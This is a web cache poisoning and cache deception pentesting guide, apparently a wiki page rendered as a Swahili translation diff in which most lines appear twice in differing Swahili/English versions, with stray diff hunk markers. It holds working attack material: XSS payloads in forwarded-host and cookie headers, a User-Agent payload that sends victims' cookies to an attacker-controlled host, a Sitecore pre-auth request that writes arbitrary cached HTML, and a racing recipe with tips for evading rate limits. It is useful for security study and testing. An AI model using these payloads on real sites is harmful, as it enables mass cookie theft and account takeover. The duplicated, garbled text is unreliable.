Cache poisoning inalenga kuingilia cache ya upande wa mteja ili kumlazimisha mteja kupakia rasilimali zisizotarajiwa, zisizokamilika, au zilizo chini ya udhibiti wa mshambuliaji. Ukubwa wa athari unategemea maarufu ya ukurasa uliokumba, kwani majibu yaliyochafu hutolewa kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafu wa cache pekee.
Cache poisoning inalenga kudanganya client-side cache ili kulazimisha clients kupakia rasilimali zisizotarajiwa, zisizokamilika, au zilizo chini ya udhibiti wa mshambuliaji. Uwezo wa madhara unategemea umaarufu wa ukurasa ulioathiriwa, kwani jibu lililochafuka hutolewa kwa watumiaji wanaotembelea ukurasa wakati wa kipindi cha uchafuzi wa cache.
Utekelezaji wa shambulio la cache poisoning unahusisha hatua kadhaa:
Utekelezaji wa shambulio la cache poisoning unajumuisha hatua kadhaa:
1. **Kuainisha vigezo visivyotumika kama key**: Hii ni vigezo ambavyo, ingawa havihitajiki kwa ombi kuhifadhiwa kwenye cache, vinaweza kubadilisha majibu yanayotolewa na server. Kuainisha vigezo hivi ni muhimu kwa sababu vinaweza kutumiwa kuathiri cache.
2. **Kutumia vigezo visivyo na key**: Baada ya kuainisha vigezo visivyo na key, hatua inayofuata ni kubaini jinsi ya kutumia vibaya vigezo hivi ili kubadilisha majibu ya server kwa njia inayomfaa mshambuliaji.
3. **Kuhakikisha Majibu yaliyochafu yamehifadhiwa kwenye cache**: Hatua ya mwisho ni kuhakikisha kuwa majibu yaliyobadilishwa yamehifadhiwa kwenye cache. Kwa njia hiyo, mtumiaji yeyote anayeingia ukurasa uliokumba wakati cache imechafuka atapokea jibu lililochafuka.
1. **Identification of Unkeyed Inputs**: Hivi ni vigezo ambavyo, ingawa hazihitajiki ili ombi lihifadhiwe kwenye cache, vinaweza kubadilisha jibu linalorejeshwa na server. Kutambua viingilio hivi ni muhimu kwani vinaweza kutumika kutengeneza cache.
2. **Exploitation of the Unkeyed Inputs**: Baada ya kutambua Unkeyed Inputs, hatua inayofuata ni kubaini jinsi ya kuvitumia vigezo hivi kwa njia inayobadilisha jibu la server kwa manufaa ya mshambuliaji.
3. **Ensuring the Poisoned Response is Cached**: Hatua ya mwisho ni kuhakikisha kwamba jibu lililobadilishwa limehifadhiwa kwenye cache. Kwa njia hii, mtumiaji yeyote anayefikia ukurasa ulioathiriwa wakati cache imepoisoned atapokea jibu lililopotoshwa.
### Discovery: Check HTTP headers
Kawaida, wakati jibu lilihifadhiwa kwenye cache kutakuwa na kichwa kinachoonyesha hivyo; unaweza kuangalia ni vichwa gani vinavyostahili kuzingatiwa katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
Kwa kawaida, wakati jibu lime**stored in the cache** kutakuwa na **header inayoonyesha hivyo**; unaweza kuangalia ni header zipi unazopaswa kuzingatia katika chapisho hili: [**HTTP Cache headers**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers).
### Discovery: Caching error codes
Iwapo unafikiri jibu linawekwa kwenye cache, unaweza kujaribu kutuma maombi yenye header mbaya, ambayo yanapaswa kurejelewa na status code 400. Kisha jaribu kufikia ombi kawaida na ikiwa jibu ni status code 400, unajua ni vunja (na hata unaweza kutekeleza DoS).
Iwapo unadhani jibu linawekwa kwenye cache, unaweza kujaribu **kutuma maombi kwa header mbaya**, ambazo zinapaswa kujibiwa na **status code 400**. Kisha jaribu kufikia ombi kwa kawaida na ikiwa **jibu ni status code 400**, unajua ni dhaifu (na unaweza hata kutekeleza DoS).
You can find more options in:
@ -34,45 +34,45 @@ You can find more options in:
cache-poisoning-to-dos.md
{{#endref}}
Hata hivyo, kumbuka kwamba wakati mwingine aina hizi za status codes hazihifadhiwi kwenye cache, kwa hivyo jaribio hili halina uhakika.
Hata hivyo, kumbuka kwamba **mara nyingine misimbo ya aina hizi ya status haijihifadhi kwenye cache** hivyo jaribio hili linaweza kutokuwa la kuaminika.
### Discovery: Identify and evaluate unkeyed inputs
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) kufanyia brute-force parameters na headers ambazo zinaweza kubadilisha jibu la ukurasa. Kwa mfano, ukurasa unaweza kutumia header `X-Forwarded-For` kuonyesha mteja kupakia script kutoka huko:
Unaweza kutumia [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) ku**brute-force parameters and headers** ambazo zinaweza **kubadilisha jibu la ukurasa**. Kwa mfano, ukurasa unaweza kutumia header `X-Forwarded-For` kuonyesha client apakie script kutoka pale:
```html
<script type="text/javascript" src="//<X-Forwarded-For_value>/resources/js/tracking.js"></script>
```
### Sababisha jibu hatari kutoka kwa back-end server
### Sababisha jibu hatarishi kutoka kwa back-end server
Ukibaini parameter/header, angalia jinsi inavyosafishwa na wapi inarejea au inavyoathiri response kutoka kwa header. Je, unaweza kuitumia vibaya (perform an XSS au load JS unayodhibiti? perform DoS?...)
With the parameter/header identified check how it is being **inayosafishwa** and **wapi** ina **kuonekana** au kuathiri jibu kutoka kwa header. Je, unaweza kuiboresha vibaya (perform an XSS au load JS code unaodhibiti? perform a DoS?...)
### Pata response ikahifadhiwa kwenye cache
### Get the response cached
Mara baada ya kuwa umeya **baini** **page** inayoweza kutumika vibaya, ni **parameter**/**header** gani ya kutumia na **jinsi** ya kuiabusa, unahitaji kuhakikisha ukurasa umehifadhiwa kwenye cache. Kulingana na rasilimali unayotaka kuweka kwenye cache, inaweza kuchukua muda; huenda ukahitaji kujaribu kwa sekunde kadhaa.
Mara tu unapokuwa umebaini ukurasa unaoweza kutumiwa vibaya, parameter/header gani ya kutumia na jinsi ya kuitumia vibaya, unahitaji kupata ukurasa urehitishwe kwenye cache. Kulingana na rasilimali unayojaribu kuweka kwenye cache hii inaweza kuchukua muda, huenda ukahitaji kujaribu kwa sekunde kadhaa.
Header **`X-Cache`** katika response inaweza kuwa muhimu kwani inaweza kuwa na thamani **`miss`** wakati request haikuwekwa kwenye cache na thamani **`hit`** wakati imehifadhiwa.\
Header **`Cache-Control`** pia ni muhimu kujua ikiwa rasilimali inawekwa kwenye cache na ni lini itahifadhiwa tena: `Cache-Control: public, max-age=1800`
The header **`X-Cache`** in the response could be very useful as it may have the value **`miss`** when the request wasn't cached and the value **`hit`** when it is cached.\
The header **`Cache-Control`** is also interesting to know if a resource is being cached and when will be the next time the resource will be cached again: `Cache-Control: public, max-age=1800`
Header nyingine ya kuvutia ni **`Vary`**. Header hii mara nyingi hutumika kuonyesha **headers za ziada** zinazochukuliwa kama **sehemu ya cache key** hata kama kawaida hazizingatiiwi kama key. Kwa hivyo, ikiwa mshambuliaji anajua `User-Agent` ya mwathiriwa anayemlenga, anaweza poison the cache kwa watumiaji wanaotumia `User-Agent` hiyo.
Another interesting header is **`Vary`**. This header is often used to **indicate additional headers** that are treated as **part of the cache key** even if they are normally unkeyed. Therefore, if the user knows the `User-Agent` of the victim he is targeting, he can poison the cache for the users using that specific `User-Agent`.
Header nyingine inayohusiana na cache ni **`Age`**. Inabainisha muda kwa sekunde ambao kitu kimekuwa katika proxy cache.
One more header related to the cache is **`Age`**. It defines the times in seconds the object has been in the proxy cache.
Unapohifadhi request kwenye cache, kuwa **makini na headers unazotumia** kwa sababu baadhi yao yanaweza **kutumika bila kutarajiwa** kama **keyed** na **mwathiriwa atahitaji kutumia header hiyo hiyo**. Daima **jaribu** Cache Poisoning kwa **browsers tofauti** ili uhakikishe inafanya kazi.
When caching a request, be **careful with the headers you use** because some of them could be **used unexpectedly** as **keyed** and the **victim will need to use that same header**. Always **test** a Cache Poisoning with **different browsers** to check if it's working.
## Mifano ya Exploiting
## Exploiting Examples
### Mfano rahisi zaidi
### Mfano rahisi
Header kama `X-Forwarded-For` inarejea kwenye response bila kusafishwa.\
Unaweza kutuma payload ya msingi ya XSS na poison the cache ili kila mtu anayefungua ukurasa apate XSS:
A header like `X-Forwarded-For` is being reflected in the response unsanitized.\
You can send a basic XSS payload and poison the cache so everybody that accesses the page will be XSSed:
```html
GET /en?region=uk HTTP/1.1
Host: innocent-website.com
X-Forwarded-Host: a."><script>alert(1)</script>"
```
_Kumbuka kwamba hii itapoison ombi kwa `/en?region=uk` si kwa `/en`_
_Kumbuka kwamba hii itapoisina ombi la `/en?region=uk` si la `/en`_
### Cache poisoning to DoS
### Cache poisoning kwa DoS
{{#ref}}
@ -81,23 +81,23 @@ cache-poisoning-to-dos.md
### Cache poisoning through CDNs
Katika **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** inaelezea tukio rahisi lifuatalo:
In **[this writeup](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html)** inaeleza tukio rahisi lifuatayo:
- CDN itakayocache chochote chini ya `/share/`
- CDN haitadecode wala haitanormalize `%2F..%2F`, kwa hivyo inaweza kutumika kama **path traversal to access other sensitive locations that will be cached** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
- Server ya wavuti WILL decode and normalize `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **ina auth token**.
- CDN itacache chochote chini ya `/share/`
- CDN HAITA decode wala normalize `%2F..%2F`, kwa hivyo, inaweza kutumika kama **path traversal to access other sensitive locations that will be cached** kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123`
- web server ITADECODE na ITANORMALIZE `%2F..%2F`, na itajibu na `/api/auth/session`, ambayo **contains the auth token**.
### Using web cache poisoning to exploit cookie-handling vulnerabilities
### Kutumia web cache poisoning ku-exploit cookie-handling vulnerabilities
Cookies pia zinaweza kuonekana katika response ya ukurasa. Ikiwa unaweza kuabuse hilo kusababisha XSS, kwa mfano, unaweza ku-exploit XSS katika clients kadhaa zinazopakia malicious cache response.
Cookies pia zinaweza kuonyeshwa kwenye response ya ukurasa. Ikiwa unaweza kuziabusi (abuse) kusababisha XSS kwa mfano, ungeweza ku-exploit XSS katika wateja kadhaa ambao wanapakia malicious cache response.
```html
GET / HTTP/1.1
Host: vulnerable.com
Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
```
Kumbuka kwamba ikiwa cookie iliyo hatarini inatumiwa mara kwa mara na watumiaji, maombi ya kawaida yataosha cache.
Kumbuka kwamba ikiwa cookie yenye udhaifu inatumiwa sana na watumiaji, maombi ya kawaida yatasababisha cache kusafishwa.
### Generating discrepancies with delimiters, normalization and dots <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### Kutengeneza tofauti kwa delimiters, normalization na dots <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
Angalia:
@ -108,18 +108,18 @@ cache-poisoning-via-url-discrepancies.md
### Cache poisoning with path traversal to steal API key <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
[**This writeup explains**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba OpenAI API key kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitabebwa bila Cloudflare normalising the URL, ambayo ilifanywa wakati ombi lilipofika kwenye web server.
[**Uandishi huu unaelezea**](https://nokline.github.io/bugbounty/2024/02/04/ChatGPT-ATO.html) jinsi ilivyowezekana kuiba OpenAI API key kwa URL kama `https://chat.openai.com/share/%2F..%2Fapi/auth/session?cachebuster=123` kwa sababu chochote kinacholingana na `/share/*` kitapigwa cache bila Cloudflare kurekebisha URL, hatua ambayo ilifanyika wakati ombi lilipofika kwenye web server.
Hii pia imeelezewa vyema katika:
Hii pia inaelezewa vizuri zaidi katika:
{{#ref}}
cache-poisoning-via-url-discrepancies.md
{{#endref}}
### Using multiple headers to exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
### Kutumia multiple headers ili ku-exploit web cache poisoning vulnerabilities <a href="#using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities" id="using-multiple-headers-to-exploit-web-cache-poisoning-vulnerabilities"></a>
Wakati mwingine utahitaji **exploit several unkeyed inputs** ili uweze abuse cache. Kwa mfano, unaweza kupata an **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa domain unayodhibiti na `X-Forwarded-Scheme` kuwa `http`. Ikiwa **server** inafanya **forwarding** maombi yote ya **HTTP** **to HTTPS** na inatumia header `X-Forwarded-Scheme` kama jina la domain kwa redirect, unaweza kudhibiti wapi ukurasa unaelekezwa na redirect.
Wakati mwingine utahitaji **exploit several unkeyed inputs** ili uweze ku-abuse cache. Kwa mfano, unaweza kupata an **Open redirect** ikiwa utaweka `X-Forwarded-Host` kwa domain unayodhibiti na `X-Forwarded-Scheme` kwa `http`. **If** the **server** is **forwarding** all the **HTTP** requests **to HTTPS** and using the header `X-Forwarded-Scheme` as the domain name for the redirect, unaweza kudhibiti mahali ukurasa utaelekezwa na redirect.
```html
GET /resources/js/tracking.js HTTP/1.1
Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
@ -128,7 +128,7 @@ X-Forwarded-Scheme: http
```
### Kutumia `Vary`header iliyopunguzwa
Ikiwa umegundua kwamba **`X-Host`** header inatumika kama **jina la domaini kupakia rasilimali ya JS** lakini header ya **`Vary`** katika jibu inaonyesha **`User-Agent`**. Kisha, unahitaji kupata njia ya exfiltrate `User-Agent` ya mwanaathirika na poison the cache ukitumia `User-Agent` huo:
Ikiwa umegundua kuwa header ya **`X-Host`** inatumiwa kama **domain name to load a JS resource** lakini header ya **`Vary`** katika jibu inaonyesha **`User-Agent`**, basi unahitaji kupata njia ya exfiltrate User-Agent ya victim na poison the cache ukitumia user agent hiyo:
```html
GET / HTTP/1.1
Host: vulnerbale.net
@ -137,7 +137,7 @@ X-Host: attacker.com
```
### Fat Get
Tuma GET request yenye request katika URL na katika body. Ikiwa web server inatumia ile kutoka body lakini cache server inahifadhi ile kutoka URL, yeyote anayefikia URL hiyo atatumia parameter kutoka body. Kama vile vuln James Kettle alipogundua kwenye Github website:
Tuma GET request ambapo request iko kwenye URL na pia kwenye body. Ikiwa web server inatumia ile kutoka body lakini cache server inakasha ile kutoka URL, yeyote anayetembelea URL hiyo ataitumia parameter kutoka body. Kama vuln aliyogunduliwa na James Kettle kwenye Github website:
```
GET /contact/report-abuse?report=albinowax HTTP/1.1
Host: github.com
@ -146,39 +146,39 @@ Content-Length: 22
report=innocent-victim
```
Kuna labu ya PortSwigger kuhusu hili: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
Kuna lab ya PortSwigger kuhusu hili: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-fat-get)
### Parameter Cloacking
For example it's possible to separate **parameters** in ruby servers using the char **`;`** instead of **`&`**. This could be used to put unkeyed parameters values inside keyed ones and abuse them.
Kwa mfano, inawezekana kutenganisha **parameters** kwenye ruby servers kwa kutumia herufi **`;`** badala ya **`&`**. Hii inaweza kutumiwa kuweka thamani za parameters zisizo na ufunguo ndani ya zile zilizo na ufunguo na kuzitumia vibaya.
Portswigger lab: [https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws/lab-web-cache-poisoning-param-cloaking)
### Exploiting HTTP Cache Poisoning by abusing HTTP Request Smuggling
Jifunze hapa kuhusu jinsi ya kufanya [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
Jifunze hapa jinsi ya kufanya [Cache Poisoning attacks by abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-poisoning).
### Upimaji wa otomatiki kwa Web Cache Poisoning
### Upimaji otomatiki wa Web Cache Poisoning
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) inaweza kutumiwa kupima otomatiki kwa web cache poisoning. Inasaidia mbinu nyingi tofauti na inaweza kubinafsishwa kwa kiasi kikubwa.
The [Web Cache Vulnerability Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) inaweza kutumika kupima kiotomatiki web cache poisoning. Inasaidia mbinu nyingi tofauti na inaweza kubadilishwa kwa urahisi.
Mfano wa matumizi: `wcvs -u example.com`
Example usage: `wcvs -u example.com`
### Header-reflection XSS + CDN/WAF-assisted cache seeding (User-Agent, auto-cached .js)
Mfano huu wa ulimwengu halisi unaunganisha primitive ya header-based reflection na tabia ya CDN/WAF ili kwa kuaminika ku-poison HTML iliyohifadhiwa (cached) inayotumiwa kwa watumiaji wengine:
Mfumo huu wa ulimwengu halisi unaunganisha primitive ya reflection inayotokana na header na tabia za CDN/WAF ili kwa uhakika poison the cached HTML inayotolewa kwa watumiaji wengine:
- HTML kuu iliakisi header ya request isiyoaminika (kwa mfano, `User-Agent`) ndani ya executable context.
- CDN iliondoa cache headers lakini kulikuwepo cache ya internal/origin. CDN pia ili-auto-cache requests zinazomalizika kwa extensions za static (kwa mfano, `.js`), wakati WAF ilitumia ukaguzi mdogo wa maudhui kwa GETs za static assets.
- Mabadiliko ya mtiririko wa requests yaliwezesha request kwa njia ya `.js` kuathiri cache key/variant iliyotumika kwa HTML kuu iliyofuata, hivyo kuwezesha cross-user XSS kupitia header reflection.
- The main HTML reflected an untrusted request header (e.g., `User-Agent`) into executable context.
- The CDN stripped cache headers but an internal/origin cache existed. The CDN also auto-cached requests ending in static extensions (e.g., `.js`), while the WAF applied weaker content inspection to GETs for static assets.
- Request flow quirks allowed a request to a `.js` path to influence the cache key/variant used for the subsequent main HTML, enabling cross-user XSS via header reflection.
Mapishi ya vitendo (iliyoshuhudiwa kwenye CDN/WAF maarufu):
Practical recipe (observed across a popular CDN/WAF):
1) Kutoka IP safi (epuka prior reputation-based downgrades), weka `User-Agent` yenye uhasama kupitia browser au Burp Proxy Match & Replace.
2) Katika Burp Repeater, andaa kundi la requests mbili na tumia "Send group in parallel" (single-packet mode works best):
- Request ya kwanza: GET njia ya rasilimali ya `.js` kwenye origin ileile huku ukituma `User-Agent` yako yenye uhasama.
- Mara moja baada yake: GET ukurasa mkuu (`/`).
3) Mbio za routing za CDN/WAF pamoja na `.js` iliyohifadhiwa kwa otomatiki mara nyingi huzaa variant ya HTML iliyopoisona katika cache ambayo kisha hutumika kwa wageni wengine wanaoshiriki masharti yale yale ya cache key (kwa mfano, same `Vary` dimensions like `User-Agent`).
1) From a clean IP (avoid prior reputation-based downgrades), set a malicious `User-Agent` via browser or Burp Proxy Match & Replace.
2) In Burp Repeater, prepare a group of two requests and use "Send group in parallel" (single-packet mode works best):
- First request: GET a `.js` resource path on the same origin while sending your malicious `User-Agent`.
- Immediately after: GET the main page (`/`).
3) The CDN/WAF routing race plus the auto-cached `.js` often seeds a poisoned cached HTML variant that is then served to other visitors sharing the same cache key conditions (e.g., same `Vary` dimensions like `User-Agent`).
Mfano wa header payload (to exfiltrate non-HttpOnly cookies):
```
@ -186,30 +186,30 @@ User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oas
```
Operational tips:
- CDNs nyingi huficha cache headers; poisoning inaweza kuonekana tu kwenye mizunguko ya refresh ya masaa mengi. Tumia multiple vantage IPs na throttle ili kuepuka rate-limit au reputation triggers.
- Kutumia IP kutoka cloud ya CDN mwenyewe wakati mwingine huboresha routing consistency.
- Ikiwa kuna CSP kali, bado inafanya kazi ikiwa reflection inaendeshwa katika main HTML context na CSP inaruhusu inline execution au inapitiwa na context.
- Many CDNs hide cache headers; poisoning may appear only on multi-hour refresh cycles. Use multiple vantage IPs and throttle to avoid rate-limit or reputation triggers.
- Using an IP from the CDN's own cloud sometimes improves routing consistency.
- If a strict CSP is present, this still works if the reflection executes in main HTML context and CSP allows inline execution or is bypassed by context.
Impact:
- Ikiwa session cookies si `HttpOnly`, zero-click ATO inawezekana kwa mass-exfiltrating `document.cookie` kutoka kwa watumiaji wote wanaopokelewa poisoned HTML.
- If session cookies arent `HttpOnly`, zero-click ATO is possible by mass-exfiltrating `document.cookie` from all users who are served the poisoned HTML.
Defenses:
- Acha ku-reflect request headers ndani ya HTML; context-encode kwa ukali ikiwa haiwezi kuepukika. Linganisha sera za cache za CDN na origin na epuka ku-vary kwa headers zisizoaminika.
- Hakikisha WAF inatumia content inspection kwa uthabiti kwa `.js` requests na static paths.
- Weka `HttpOnly` (na `Secure`, `SameSite`) kwenye session cookies.
- Stop reflecting request headers into HTML; strictly context-encode if unavoidable. Align CDN and origin cache policies and avoid varying on untrusted headers.
- Ensure WAF applies content inspection consistently to `.js` requests and static paths.
- Set `HttpOnly` (and `Secure`, `SameSite`) on session cookies.
### Sitecore preauth HTML cache poisoning (unsafe XAML Ajax reflection)
Mfumo maalum wa Sitecore huruhusu uandishi usioidhinishwa kwenye HtmlCache kwa kutumia vibaya preauth XAML handlers na AjaxScriptManager reflection. Wakati handler ya `Sitecore.Shell.Xaml.WebControl` inafikiwa, `xmlcontrol:GlobalHeader` (iliyotokana na `Sitecore.Web.UI.WebControl`) inapatikana na wito wa reflective ufuatao unaruhusiwa:
A Sitecorespecific pattern enables unauthenticated writes to the HtmlCache by abusing preauth XAML handlers and AjaxScriptManager reflection. When the `Sitecore.Shell.Xaml.WebControl` handler is reached, an `xmlcontrol:GlobalHeader` (derived from `Sitecore.Web.UI.WebControl`) is available and the following reflective call is allowed:
```
POST /-/xaml/Sitecore.Shell.Xaml.WebControl
Content-Type: application/x-www-form-urlencoded
__PARAMETERS=AddToCache("key","<html>…payload…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
Hii inaandika HTML yoyote chini ya cache key iliyochaguliwa na mshambuliaji, ikiruhusu precise poisoning mara cache keys zinapojulikana.
Hii inaandika arbitrary HTML chini ya cache key iliyochaguliwa na mshambuliaji, ikiruhusu precise poisoning mara cache keys zinapojulikana.
For full details (cache key construction, ItemService enumeration and a chained postauth deserialization RCE):
@ -217,39 +217,39 @@ For full details (cache key construction, ItemService enumeration and a chained
../../network-services-pentesting/pentesting-web/sitecore/README.md
{{#endref}}
## Mifano Inayoweza Kuathiriwa
## Mifano Yenye Udhaifu
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
ATS ilituma fragment ndani ya URL bila kuiondoa na ikatengeneza cache key ikitumia tu host, path na query (ikisingiza fragment). Hivyo ombi `/#/../?r=javascript:alert(1)` lilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na cache key haikuwa na payload ndani yake, ilikuwa na host, path na query tu.
ATS ilipeleka fragment ndani ya URL bila kuifuta na ilitengeneza cache key ikitumia tu host, path and query (ikiepuka fragment). Kwa hivyo request `/#/../?r=javascript:alert(1)` ilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na cache key haikujumuisha payload ndani yake, ilikuwa tu host, path and query.
### GitHub CP-DoS
Kutuma thamani mbaya kwenye content-type header ilisababisha response ya 405 iliyohifadhiwa (cached). Cache key ilijumuisha cookie hivyo ilikuwa inawezekana kushambulia tu unauth users.
Kutuma thamani mbaya kwenye header ya content-type ilisababisha majibu ya 405 yaliyohifadhiwa kwenye cache. Cache key ilijumuisha cookie, hivyo ilikuwa inawezekana kushambulia tu watumiaji wasiothibitishwa.
### GitLab + GCP CP-DoS
GitLab inatumia GCP buckets kuhifadhi static content. **GCP Buckets** zinaunga mkono header **`x-http-method-override`**. Kwa hivyo ilikuwa inawezekana kutuma header `x-http-method-override: HEAD` na poison the cache ili irudishe response body tupu. Pia inaweza kusaidia method `PURGE`.
GitLab inatumia GCP buckets kuhifadhi static content. **GCP Buckets** support the **header `x-http-method-override`**. Hivyo ilikuwa inawezekana kutuma header `x-http-method-override: HEAD` na poison the cache into returning an empty response body. Inaweza pia kuunga mkono method `PURGE`.
### Rack Middleware (Ruby on Rails)
Katika applications za Ruby on Rails, Rack middleware mara nyingi hutumika. Kusudi la code ya Rack ni kuchukua thamani ya header **`x-forwarded-scheme`** na kuiweka kama scheme ya request. Wakati header `x-forwarded-scheme: http` inapotumwa, hutokea redirect ya 301 kwenda eneo lile lile, jambo ambalo linaweza kusababisha Denial of Service (DoS) kwa rasilimali hiyo. Zaidi ya hayo, application inaweza kutambua header `X-forwarded-host` na kuwarudisha watumiaji kwenye host iliyotajwa. Tabia hii inaweza kusababisha kupakia kwa faili za JavaScript kutoka kwenye server ya mshambuliaji, na hivyo kuleta hatari ya usalama.
Katika applications za Ruby on Rails, Rack middleware mara nyingi hutumika. Kusudi la Rack code ni kuchukua thamani ya **`x-forwarded-scheme`** header na kuiweka kama scheme ya request. Wakati header `x-forwarded-scheme: http` imetumwa, redirect ya 301 kwenda location ileile inatokea, ambayo inaweza kusababisha Denial of Service (DoS) kwa resource hiyo. Zaidi ya hayo, application inaweza kutambua `X-forwarded-host` header na kuelekeza watumiaji kwenye host iliyobainishwa. Tabia hii inaweza kusababisha ku-loading kwa JavaScript files kutoka kwa server ya mshambuliaji, ikileta hatari ya usalama.
### 403 and Storage Buckets
Cloudflare hapo awali ilihakikisha (cached) majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa Authorization headers zisizo sahihi kungepelekea jibu la 403 ambalo lilihifadhiwa. Ingawa Cloudflare imeacha caching ya majibu ya 403, tabia hii inaweza bado kuwepo katika proxy services zingine.
Cloudflare hapo awali ilihifadhi (cache) majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa Authorization headers zisizo sahihi kunasababisha majibu ya 403 ambayo yalihifadhiwa kwenye cache. Ingawa Cloudflare imeacha caching majibu ya 403, tabia hii bado inaweza kuwepo kwenye proxy services nyingine.
### Injecting Keyed Parameters
Caches mara nyingi hujumuisha parameters maalum za GET kwenye cache key. Kwa mfano, Varnish ya Fastly ilihakikisha parameter ya `size` katika requests. Hata hivyo, kama toleo lililotumwa kwa URL-encoding la parameter (mfano, `siz%65`) lililetwa pia na thamani isiyo sahihi, cache key ingejengwa kwa kutumia parameter sahihi ya `size`. Hata hivyo, backend itashughulikia thamani katika parameter iliyokuwa URL-encoded. Kufanya URL-encoding kwa parameter ya pili `size` kulisababisha kutokujumuishwa kwake na cache lakini kutumika na backend. Kuipa thamani ya 0 parameter hii kulipelekea kosa la 400 Bad Request ambalo lingeweza kuhifadhiwa na cache.
Caches mara nyingi hujumuisha specific GET parameters katika cache key. Kwa mfano, Fastly's Varnish cached the `size` parameter in requests. Hata hivyo, kama version iliyokuwa URL-encoded ya parameter (mfano `siz%65`) ilitumwa pia na thamani isiyo sahihi, cache key ingejengwa ikitumia parameter sahihi ya `size`. Lakini backend ingefanya process ya thamani iliyomo kwenye parameter iliyouzwa. URL-encoding ya parameter ya pili ya `size` ilisababisha kutokujumuishwa kwake na cache lakini kutumika na backend. Kutoa thamani 0 kwa parameter hii ilizalisha cacheable 400 Bad Request error.
### User Agent Rules
Baadhi ya developers huzuia requests zenye user-agents zinazolingana na zana za trafiki kubwa kama FFUF au Nuclei ili kudhibiti mzigo wa server. Kwa uwazi, njia hii inaweza kuleta udhaifu kama cache poisoning na DoS.
Baadhi ya developers huzuia requests zenye user-agents zinazolingana na za tools zenye traffic kubwa kama FFUF au Nuclei ili kudhibiti server load. Kwa mshangao, njia hii inaweza kuleta udhaifu kama cache poisoning na DoS.
### Illegal Header Fields
[https://datatracker.ietf.mrg/doc/html/rfc7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inabainisha characters zinazoruhusiwa kwenye header names. Headers zenye characters zisizo ndani ya range ya **tchar** kwa kawaida zinapaswa kusababisha jibu la 400 Bad Request. Katika utekelezaji, servers si kila wakati zinafuata standard hii. Mfano muhimu ni Akamai, ambayo inapeleka headers zenye characters zisizo halali na inahifadhi (cache) kosa lolote la 400, mradi tu header `cache-control` haipo. Muundo unaoweza kutumika ulitambuliwa ambapo kutuma header yenye character isiyokubalika, kama `\`, kungepelekea kosa la 400 Bad Request linaloweza kuhifadhiwa na cache.
[https://datatracker.ietf.mrg/doc/html/rfc7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inaeleza characters zinazokubaliwa katika header names. Headers zenye characters nje ya range ya **tchar** zinapaswa kwa dhana kusababisha 400 Bad Request. Katika vitendo, servers hazizingatii standard hii kila mara. Mfano muhimu ni Akamai, ambayo inapitisha headers zenye characters zisizo halali na hufanya cache kwa error yoyote ya 400, mradi tu header `cache-control` haipo. Mchoro unaoweza kutumika ulitambuliwa ambapo kutuma header yenye character isiyo halali, kama `\`, kungepelekea cacheable 400 Bad Request error.
### Kupata headers mpya
@ -257,9 +257,9 @@ Baadhi ya developers huzuia requests zenye user-agents zinazolingana na zana za
## Cache Deception
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
Lengo la Cache Deception ni kufanya clients waloadi resources ambazo zitatunzwa na cache zikiwa na taarifa zao za siri.
